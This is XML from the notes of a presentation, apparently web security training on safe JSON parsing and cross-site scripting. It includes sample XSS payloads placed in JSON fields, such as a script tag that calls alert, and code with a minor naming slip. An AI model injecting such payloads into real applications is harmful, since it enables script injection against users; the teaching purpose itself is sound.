                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>location_comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>": "Once parsed unsafely, the location XSS will run automatically, as a self-executing function. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> can help with this, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>jQuery's</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parseJSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> uses it by default (as do $.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "bio": "&lt;script type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'&gt;alert('XSS 2!');&lt;/script&gt;",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        "_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>bio_comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>": "This XSS will execute once it is added to the DOM, if not properly escaped  before adding it. This is more of a persistent kind of XSS attack, typically from poor input validation on server side."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12878375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Converting a JSON string into a JavaScript object is a very common task in web development. For that reason, all of the modern browsers support both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> functions. These methods are safe and are the recommended way to securely parse JSON. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note that if the parsed JSON is syntactically incorrect, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() method will through an exception that must be handled in the try-catch block.</a:t>
            </a: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Prior to browser support for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> lots of applications used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or new Function() to convert JSON strings into JavaScript objects. Doing this might open an application up to XSS vulnerabilities, because if the JSON string contains JavaScript without double quotes, it will be executed in the context of your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The example below uses a secure example of using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to query https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>items.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to process the JSON that has successfully returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>var</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xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xhr.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("GET", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://example.com/item.json"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xhr.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xhr.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> === 4){  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xhr.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> === 200){ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> response = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xhr.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> response = "Error Occurred";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>oReq.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11257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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40168081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If your server-rendered page contains...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>window.__INITIAL_STATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) %&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>...you will be open to an XSS attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
